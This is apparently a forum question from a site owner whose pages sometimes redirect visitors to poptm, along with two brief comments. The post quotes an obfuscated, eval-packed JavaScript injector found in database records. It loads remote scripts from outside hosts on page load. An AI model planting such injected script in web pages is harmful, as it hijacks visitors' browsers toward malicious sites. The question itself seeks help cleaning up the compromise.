# why My website some time redirect to poptm

Tags: javascript, database, security, web, web-hosting

Some time if I click a link in my website, my browser open extra window and redirect to poptm url, so I try

> https://www.google.com/transparencyreport/safebrowsing/diagnostic/

the diagnostic result show that

> Some pages on my website send visitors to the following dangerous websites: majalah-paradigma.webs.com, zief.pl, and chura.pl.

I try to scan my website with this https://aw-snap.info/file-viewer/ , and the result show me some java script code like this

```
<script type="text/javascript" data-cfasync="false">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('!1(){2 e=d;2 t,o=["//g.s.j/3.5","//l.h/3.5",""],n=0,r=1(){f(""!=o[n]){t=e.4.c("6"),t.b="7/8",t.9=!0;2 a=e.4.q("6")[0];t.i=o[n],t.k=1(){n++,r()},a.m.p(t,a)}};r()}();',30,30,'|function|var|9937|document|js|script|text|javascript|async||type|createElement|window||if|code|cf|src|com|onerror|javacript|parentNode|||insertBefore|getElementsByTagName||poptm|'.split('|'),0,{}))
```

I try to find that code in my website but I can't find that code, so I try my database, I find in one of my table column there are three record that have the code like above, so I delete that record, but I am confused how that code  insert code to my database, I try to google poptm, I find poptm is tools to  Bypass Adblock, so I think some malware may be have installed poptm to my website, so deleting record from my database may not a solution , how I can delete this poptm  ? Any one have found something like this before? Any suggestion?

Comment: http://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: `but i am confuse how that code insert code to my database` - poor design